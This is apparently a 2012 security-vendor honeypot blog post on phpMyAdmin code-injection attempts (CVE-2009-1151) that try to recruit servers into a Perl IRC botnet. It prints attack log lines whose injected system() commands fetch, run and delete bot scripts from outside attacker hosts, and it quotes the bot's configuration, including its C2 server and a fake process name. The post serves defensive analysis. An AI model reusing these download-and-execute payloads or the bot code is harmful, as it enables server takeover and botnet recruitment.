[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment
4 Minute Read
by Ryan Barnett
Our web honeypots picked up the following attacks today:
62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.4"
195.145.156.126 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config/config.inc.php?eval=system('echo cd /tmp;wget http://dinte.altervista.org/apache_32.png -O p2.txt;curl -O http://dinte.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://dinte.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 225 "-" "curl/7.18.1 (i686-suse-linux-gnu) libcurl/7.18.1 OpenSSL/0.9.8g zlib/1.2.3 libidn/1.8"
These appear to be follow-up exploit attempts for CVE-2009-1151 which allowed for uploading of PHP code into configuration files.
Botnet Recruitment
These requests are attempting to use various OS level http client utilities (wget, curl and lynx) to download a file from the attacker's site. In both cases, the remote files are perl botnet client scripts.
Example Botnet Client Snippet
#!/usr/bin/perl
my @mast3rs = ("tzepelush","Bunicul");
my @admchan=("#scan");
$servidor='winscp.zapto.org' unless $servidor;
my $xeqt = "?p";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/bin/atd");
my @nickname = ("fattys","eliter","vxbot","smufen","dual","lee","carro","frida",
"aVe","kmod","kmod2","uselib","raptor","tmpSH","pwned","w00t","DualDuo","Intel",
"AMDPwr","Geforce","Exploit","vx8m0d","indexs","index","index2","index3","index4",
"xQt1","xQt2","xQt3","xQt4","xQt5","xQt6","xQt7","xQt8","xQt9","xQt10","TeaMrxz",
"De","Der","Det","Var","Kam","Dea","Csa","Fbi","Dea","Narko","Gone","Feber","Tull",
"Tundra","st0rms","fLash","TheLight","Nikko","Nikie","Nikkie","daniel","t0nyandr",
"Europa","Fanta","Caroline","speedline","Perf0rm","indexs","dan","educat","catina",
"bindex","hindex","n0rway","myphp","phpvuln","Alarma","GoScan","oslocity","spette",
"Cascam","vSport","vSmotor","vSteam","vSturbo","Turbost","heeman","andy","loundry",
"ranger","Carbon","TypeR","Nozz","phpforum","Nxgas","NinaGirl","Isit","lama","ouch",
"vTeam","vSpot","vCrew","xeQta","Gourl","Vulnx","Hksurl","Greedy","Mrx","counyjail",
"Spourl","Torshov","Oslos","com_xeqt","mowgli","Asus","com_mrx","MrxTeam","arrest",
"vScrew","beran","stuing","ucutter","readnot","gethelp","curpos","cutext","Busted",
"detda","kanjo","neinei","Carbon","irriter","masa","dev-null","korsett","PerlTeam",
"jada","kanjeg","mutterz","dalenmin","heimdal","Gambler","Deanz","Phreak","Getno",
"Susa","Pils","Pilz","Bilz","Clubz","Clubs","Clubbin","Fights","Kampen","telenor",
"Karss","Gophy","reactor","fileporn","filemp3","filelist","free6","purextc","upc",
"Grandis","Piccaso","Vanda","varburen","Tiesto","Jean","DjEan","MeNe","ThiS","nO",
"drspeed","fuzzy","buzzz","GoScan","Vulned","Gourl","makeconf","sshdconf","ngtno",
"m0rtem","cat0","Fuckyall","Fuckit","Aem","Greedy","Hkss","Sparco","MoMo","Carbon",
"d3nyall","vipz","dualc0rz","twoc0re","gotit","h0lyshit","prtls","rapt0r","Getde",
"Vulnx","d3nyurl","vUlnurl","v0dka","Torshov","turboo","Boost","fasty","fr","getfr",
"datacore","dualcore","Daniel","spurv","byrds","jails","spoot","speels","ml","getd",
"Antivi","nod32","Screwed","alias","mekkka","template","f0rm3","p0ker","Geton","NO",
"Door","Borr","Jaarn","Sporet","Dopa","Hasjen","purxTc","Liquer","Justlink","Asust",
"Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner",
"Edward","Eickenhorst","Eliasson","Erdos","Erez","Espinoza","Estes","Etter","Eina",
"Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","d0",
"Everett","Fabbris","Fagan","Faioes","Altavista","Flamor","Faris","Farone","f00ln3t",
"Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman","Euripides","Enzoo","d00rk",
"Wikii","Wifii","Jvc","s0nny","lekter","herrier","sp0ker","netply","netb0st","Liq",
"comma","julie","sveina","andre","pulsedj","p0ker","j0ker","eFn3t","Liers","xTcno",
"Suite","Incl","Page","Mappe","Oxyd","Infode","Senil","Powers","Langu","m0d","doch",
"Snakes","Ridder","Viking","Vikings","Norman","Norway","German","Info","Biz","Edud",
"Ninjas","Ilness","Teacer","Faceoff","devnull","MoMo","Spoon","Liquid","Goofy","Aj",
"Google","Yahoo","Altavista","Lycos","Sesam","Solno","Googler","ScamNet","w0rmnet",
"puman","Skeidar","Tinemelk","Freia","Tresis","Tbanen","Adenyed","Hulken","Pureice",
"Sperre","Lister","Burbon","burb0ns","Toy0","Proxes","WrxSti","Evo6","Evo7","Evo8",
"wss","bss","natron","kiwis","Reman","SevnUp","Perlpls","Spiid","Govbr","Govmil",
"Wssss","Files","xFiles","Dataw0rm","n3tw0rm","Info","Biz","Orgy","foksy","Reven",
"limbo","mambi","bambi","rummy","IluvPerl","PerlKing","Pokerking","Turboa","Gttt",
"BugScam","BugTraq","Trackqs","Que","Adidas","Umbro","Sportas","Liquid","Forume",
"Deka","Jbl","Adecco","M5R","Tuners","Techno","Sivilen","Baosh","Snuten","Purken",
"aaudi","coupe","netliga","liganet","netbase","NetSnok","Snoknet","Snifnet","libz",
"indexp","jooblaa","mamboo","Binl3n","Cplusplus","p3rls3x","illgoon","de","lime",
"homes","newsr","sindex","findex","shome","php3","eedan","Evens","Everest","kkk2",
"igal","c0lombia","freeme","dupen","d3nmark","s2ed3n","crypt0n","n0dam3n","itch",
"Domino","Tarsan","julie","Anett","Stine","Laura","Croft","Craft","Mrex","jiggy",
"Hemaan","c0nan","c0nmen","ImI","RdR","Ils","Ass","Dildo","Pula","Blow","Sn0rts",
"Aloalo","Nasa","DeaGov","FbiGov","NsaGov","CiaGov","CsiEdu","Hav0rd","djPulse",
"Oslos","Ils","cia","d3a","dea","nsa","nas","ama","kma","Scamurl","vito","xQt",
"info","cpu","pet","pacs","dino","megov","onet","xrm","tisi","parm","cico","jun",
"caos","fred","peace","dude","rox","rock","rokie","bayrn","gees","hval","wolf",
"do","go","ln","st","file","page","pag","pg","lg","lang","lng","srcs","action",
"sml","pod","nvidia","vidia","villa","kake","spat","solo","Cols","kols","kreft",
"lam","fal","dett","drop","snop","true","fake","yes","sir","mae","nmf","vmax","as",
"adio","audo","soren","tvtre","host","unitd","coda","cobra","mans","gmail","gtrs",
"remax","rik","fatig","poor","girls","pow","wop","wok","son","kolsa","royk","asss",
"los","las","angl","dream","fools","phol","phools","d0rk","spon","spalk","kalk",
"email","smtp","pops","imapd","pag","lang","lg","nav","php","spyer","cyp","hardy",
"email","null","mastr","drunk","full","beer","bayer","mage","neve","fist","haist",
"dara","dora","boris","dev","cupra","isgal","Yuri","Geez","Frys","dos","to","emul",
"pwned","kung","kim","lil","fatjo","fatman","fat","joe","does","quat","tres","eu",
"shv5","lrk","lkm","lkmrk","trk5","xt","tqex","itt","full","half","power","sender",
"does","tres","quat","fiat","spon","kvae","liim","papp","ddos","fart","noz","daim",
"liga","tvone","shdw","etcpwd","initd","ftpd","wuspl","proftp","newsd","sockd","lue",
"loma","Domma","hest","heist","tivoli","stud","dust","fust","Flue","nille","kenny",
"koma","loc","inc","incl","src","fokus","ford","chevy","wrc","cpu","cool","srchers",
"inc","incl","dir","file","sdir","mains","login","path","base","cmd","cats","farts",
"fiat","uno","jern","kober","liq","torsk","fisk","laks","hone","hore","buk","noman",
"lim","idem","prince","sveina","kine","kim","allan","hanne","terje","bukken","bruse",
"nu","do","li","faen","tater","doc","loc","pof","ninja","per","pets","sings","doper",
"liq","dop","heroin","dok","page","php3","pop","smtp","data","kilde","foss","lowrdr",
"drvby","viper","snake","dragon","dup","vuln","cat","grep","loop","inetd","proftpd",
"pasive","damp","wals","snoke","snik","poff","phil","pill","dra","drjo","djo","laby",
"rune","alan","britt","brita","stue","stenen","andy","bass","phatt","lover","fresa",
"jvc","jbl","cia","fed","sov","purk","snut","snif","deka","svovel","life","knife","so",
"deka","bos","boss","fres","spett","dusj","kappe","norman","keb0rd","fab","dor","bits",
"kniv","lisa","nina","ole","pat","mtv","charl","smokie","nabo","walk","brks","krad-3",
"dame","lady","bola","biffen","kamm","drev","sprider","spider","iscrem","daddy","pie",
"ono","tima","mytm","motor","vsmot","sport","fart","devs","var","tmp","spol","sture".
"jule","tree","gate","net","rand","perl","line","xqt","mrx","org","asus","sped","yaco",
"hash","hmm","ddos","pwr","nix","linux","bsd","ppal","aio","mars","bates","daim","da",
"pico","nmap","juge","sone","log","goofy","kars","meter","daim","kul","foksy","hyena",
"beta","pulse","driver","org","fos","kars","kma","fua","all","tea","foks","lady","fa",
"testo","bola","bolen","card","cards","chip","chips","wv","audi","bmw","roys","bechs",
"nokia","mrx","some","candy","goo","cool","scam","scan","google","lee","cam","li","dm",
"loff","grov","abcd","pulse","grow","alrt","spyd","trojan","maxd","xeqtd","xQtd","nodz",
"owner","crime","data","need","doper","hash","mysql","imapd","devil","shark","byn","ju");
my @xident = ("winscp");
my @xname = (`uname -a`);
ABOUT LEVELBLUE
LevelBlue secures what's next with intelligence-led security delivering visibility and speed to stop threats faster. As the world’s largest and most analyst-recognized pure-play managed security services provider, our AI-powered managed services and cyber expertise across managed, advisory, and incident response services help clients operate with confidence. Learn more about us.
https://www.levelblue.com/resources/blogs/internal-blog/how-to-create-a-blog-post/